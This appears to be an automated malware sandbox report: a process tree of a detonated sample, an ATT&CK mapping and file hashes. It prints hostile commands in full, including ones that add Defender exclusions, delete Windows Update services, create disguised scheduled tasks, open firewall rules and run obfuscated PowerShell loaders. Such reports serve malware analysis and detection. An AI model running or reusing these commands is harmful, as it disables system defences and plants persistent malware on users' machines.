C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:3044
- C:\Users\Admin\AppData\Local\Temp\49DEB035D46391E414506E10E5D394A9C371E61299FB5.exe
  "C:\Users\Admin\AppData\Local\Temp\49DEB035D46391E414506E10E5D394A9C371E61299FB5.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:3904
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:100680
  - - C:\Users\Admin\AppData\Local\Microsoft\ofg.exe
      "C:\Users\Admin\AppData\Local\Microsoft\ofg.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:101364
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /C schtasks /create /tn \o5jbkg8hsq /tr "C:\Users\Admin\AppData\Roaming\o5jbkg8hsq\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4388
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /tn \o5jbkg8hsq /tr "C:\Users\Admin\AppData\Roaming\o5jbkg8hsq\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
        6⤵
        Creates scheduled task(s)
        
        PID:3676
  - - C:\Users\Admin\AppData\Local\Microsoft\test.exe
      "C:\Users\Admin\AppData\Local\Microsoft\test.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:101016
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 101016 -s 336
        5⤵
        Program crash
        
        PID:396
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:55356
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:8484
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 55356 -s 432
        6⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:57436
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 101016 -s 96316
        5⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:57376
  - - C:\Users\Admin\AppData\Local\Microsoft\brave.exe
      "C:\Users\Admin\AppData\Local\Microsoft\brave.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Drops file in Program Files directory
      Suspicious use of WriteProcessMemory
      PID:900
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:55136
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:55344
      - C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        6⤵
        Launches sc.exe
        
        PID:56976
      - C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        
        PID:57044
      - C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        6⤵
        Launches sc.exe
        
        PID:57108
      - C:\Windows\system32\sc.exe
        
        sc stop bits
        6⤵
        Launches sc.exe
        
        PID:57132
      - C:\Windows\system32\sc.exe
        
        sc stop dosvc
        6⤵
        Launches sc.exe
        
        PID:57160
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
        6⤵
        
        PID:57188
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
        6⤵
        
        PID:57224
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
        6⤵
        Modifies security service
        
        PID:57244
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
        6⤵
        
        PID:57264
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        6⤵
        
        PID:57288
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        5⤵
        
        PID:55356
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:56928
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:57004
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:57064
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:57096
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:55384
    - - C:\Windows\system32\dialer.exe
        
        C:\Windows\system32\dialer.exe
        5⤵
        Drops file in Windows directory
        
        PID:57324
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:57336
      - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
        6⤵
        
        PID:57736
  - - C:\Users\Admin\AppData\Local\Microsoft\chrome.exe
      "C:\Users\Admin\AppData\Local\Microsoft\chrome.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Drops file in Windows directory
      Suspicious use of WriteProcessMemory
      PID:5000
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5044
    - - C:\Windows\SysWOW64\SCHTASKS.exe
        
        SCHTASKS /Create /TR "C:\Users\Admin\AppData\Local\Microsoft\chrome.exe" /TN "GoogleUpdateTask{56c41dbe-92cb-4ab7-b423-bd40cb65f9fe}" /SC ONLOGON /F /RL HIGHEST
        5⤵
        Creates scheduled task(s)
        
        PID:4944
    - - C:\Windows\GoogleUpdate.exe
        
        C:\Windows\GoogleUpdate.exe
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:17696
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Windows\GoogleUpdate.exe" "Google Updater" ENABLE ALL
        6⤵
        Modifies Windows Firewall
        
        PID:69172
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Google Updater" dir=in action=allow program="C:\Windows\GoogleUpdate.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:72708
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Google Updater" dir=out action=allow program="C:\Windows\GoogleUpdate.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:72736
    - - C:\Windows\SysWOW64\SCHTASKS.exe
        
        SCHTASKS /Create /TR "C:\Users\Admin\AppData\Local\Microsoft\chrome.exe" /TN "GoogleUpdateTaskUAC{0625ad4f-50a5-4d12-b200-288d853de0d5}" /SC HOURLY /F /MO 1 /RL HIGHEST
        5⤵
        Creates scheduled task(s)
        
        PID:16504
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 97584
    3⤵
    - Program crash
    PID:101000

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2784

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2772

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2756

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2736

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2692

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:2684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2480

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2472

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
PID:2444

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2348

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2156

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2084

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1740

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1988

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1976

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1904

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1896

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1812

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1780

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1700

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
1⤵
PID:1628

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1616

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1560

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1484

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1388

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1340

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1320

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1108
- C:\Users\Admin\AppData\Roaming\o5jbkg8hsq\svcupdater.exe
  C:\Users\Admin\AppData\Roaming\o5jbkg8hsq\svcupdater.exe
  2⤵
  - Executes dropped EXE
  PID:57464
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:57472
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:57456
- C:\Program Files\Google\Chrome\updater.exe
  "C:\Program Files\Google\Chrome\updater.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  PID:57768
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    3⤵
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    PID:55460
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:57196
- - C:\Windows\system32\cmd.exe
    cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:100724
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:57792
  - - C:\Windows\system32\sc.exe
      sc stop UsoSvc
      4⤵
      Launches sc.exe
      PID:3836
  - - C:\Windows\system32\sc.exe
      sc stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:88956
  - - C:\Windows\system32\sc.exe
      sc stop wuauserv
      4⤵
      Launches sc.exe
      PID:1580
  - - C:\Windows\system32\sc.exe
      sc stop bits
      4⤵
      Launches sc.exe
      PID:55284
  - - C:\Windows\system32\sc.exe
      sc stop dosvc
      4⤵
      Launches sc.exe
      PID:101284
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
      4⤵
      PID:57184
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
      4⤵
      PID:100972
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
      4⤵
      PID:57248
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
      4⤵
      PID:57300
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      4⤵
      PID:56924
- - C:\Windows\system32\cmd.exe
    cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    3⤵
    PID:101264
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:57884
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -hibernate-timeout-ac 0
      4⤵
      PID:55188
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -hibernate-timeout-dc 0
      4⤵
      PID:55428
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -standby-timeout-ac 0
      4⤵
      PID:4472
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -standby-timeout-dc 0
      4⤵
      PID:101184
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
    3⤵
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    PID:57796
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:101068
- - C:\Windows\system32\dialer.exe
    C:\Windows\system32\dialer.exe xtrjicqmdliu
    3⤵
    PID:3392
  - - C:\Windows\system32\cmd.exe
      cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
      4⤵
      Drops file in Program Files directory
      PID:57132
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:55376
- - C:\Windows\system32\cmd.exe
    cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
    3⤵
    - Drops file in Program Files directory
    PID:2000
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:55184
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic PATH Win32_VideoController GET Name, VideoProcessor
      4⤵
      PID:21644
- - C:\Windows\system32\dialer.exe
    C:\Windows\system32\dialer.exe wvhbfinhdckusjju 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZeXwQ/O4+due3etuok0KCy6TAeBBK2Zj7dzTkc9P7Txuspl/ztFHeT1vDsXwtgxIFZnxGXI+P7h6Wy2BaqsXFRrbRIyylpVUfDVtjurLuTI6hfYZYlaT2c8T3z2D8KilAioXHHI3GdcX8L+5AQJHhaF3EikxjkII2qRl4IAJt0ne1Kthho/EoWoWqiJ8V46anYGIeeueaKL6G4gUS0jG8bW+uOPYpliibsIQvftJQy3GdQNbdmaQoQosbMtF/zsQIOPYtzoBcdM/sdKVWCIsST/Py6kltT+qpekCzJYBFF4LST+8+EmmopPFkm4CPe5KhMiY/+g/sQ7d50uqIjFwwoHwsdnFS1l7B7kznzCIpeqO/4VPcOjXZ8D/gqWFx/7uyyvuxXByWtdfg2SHIbTo9ax767hx8DEZJobkKiCLCF5s3S9KZPJ6oc8SVkEHvmPn3ocLOCMVNSrrmyVksnNDnuU8b1vWVxnieD7xm0UnpffWA=
    3⤵
    PID:57744

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:884

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:984

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:424

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:440

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:944

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:100716
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3904 -ip 3904
  2⤵
  PID:100764
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 101016 -ip 101016
  2⤵
  PID:2980
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 572 -p 4212 -ip 4212
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:101284
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 548 -p 3352 -ip 3352
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:101136
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 101016 -ip 101016
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:57484
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 55356 -ip 55356
  2⤵
  PID:3608

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:101052

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Scripting

T1064

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe

Filesize
3.2MB

MD5
ae58e8058ae55a3dd3eefccb4a48be78

SHA1
09fc0b2194e8b8b5d690650057805b8966305f3e

SHA256
0af01618c8b68b42870b2fa8b0ee79ce961a3199cd8c006c7d1e770abb93030c

SHA512
fadcacb167576455ee3a1ac8e45d34c5d8aeb428490eb14572ecb8580622f5b4d82d46a9823ec0b6e7e0a4637749f8ffc35525ac7068f2236f358c353a447c99

Download Submit
C:\Program Files\Google\Chrome\updater.exe

Filesize
3.2MB

MD5
ae58e8058ae55a3dd3eefccb4a48be78

SHA1
09fc0b2194e8b8b5d690650057805b8966305f3e

SHA256
0af01618c8b68b42870b2fa8b0ee79ce961a3199cd8c006c7d1e770abb93030c

SHA512
fadcacb167576455ee3a1ac8e45d34c5d8aeb428490eb14572ecb8580622f5b4d82d46a9823ec0b6e7e0a4637749f8ffc35525ac7068f2236f358c353a447c99

Download Submit
C:\Program Files\Google\Libs\g.log

Filesize
226B

MD5
fdba80d4081c28c65e32fff246dc46cb

SHA1
74f809dedd1fc46a3a63ac9904c80f0b817b3686

SHA256
b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

SHA512
b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1A13.tmp.csv

Filesize
38KB

MD5
8cfa9998303b11bf335e4f1d5ca7e34d

SHA1
2cd6ca2319bb930c734f54bd7a0bb5b4ca0a18a8

SHA256
33c72ff55be7830f77d1157c7beb35d8b09c31cd908c43517894229c2fef009a

SHA512
dd2f752818980bad29e0290f20ec71111be1398326f010c8a258430290264ca17ff1f3b24898821802afb9da74ed0f273bc2b5d9a199ab3401188988d8b2e687

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B3D.tmp.txt

Filesize
13KB

MD5
01df35735d26978a71d4978aec21b76a

SHA1
aa8b191ecb190b51d31fadf6d94d6d2fb1278c64

SHA256
9471e05a6e457291f0e6f0e7267c720fa05831e5efabb3370bf05ca728ebc5c2

SHA512
152441cc779d264ce453f8306db9d842daac4324d5510964595d61ef0dbfa2ca100e5c8e18138fb0b4af6c2c816e14b00326c0e4bb51a56ae5058d5d2b0f8226

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3C53.tmp.csv

Filesize
36KB

MD5
35c75891fc2cedea9b291b8ade4a9f42

SHA1
13768bd43556e51bc9facaa33a308b7925047cfd

SHA256
176c562a78c7d86814929aecc90045c09653a7de44e68a55ade4705c2a094b4c

SHA512
dc4561970dc3a7ddc62688c65a872ccd7bb1334755f83caf76ce6fbe813707108b29cb4331a98b156d8e26261b6698189537d7f842508fd347236487a45070a8

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3CB1.tmp.txt

Filesize
13KB

MD5
fe297bf0739b50fac1d518f269ca71a8

SHA1
8d29d604502beeeb6039ed3aa621468da9cca9b4

SHA256
3bf700bd297f7c473597b3d812236575041761eca71527b986f9f6610261b603

SHA512
61298eefae0deca82732636377ff2efbf8bb08d751616884aded68eea04dc23c7e3f7cf5fdd52aafbc2bdc6fbd2621d3caef0a5cb420ecda45904b346d91662a

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERFA62.tmp.csv

Filesize
37KB

MD5
1df83c9b058b902363e6a3e9853b7752

SHA1
6141029df41c4ee9605301a63c9384b9851ac65c

SHA256
86b71d600e150d08b2968fe345b8a2ce9ae18fab7a50aa250af8815717609a89

SHA512
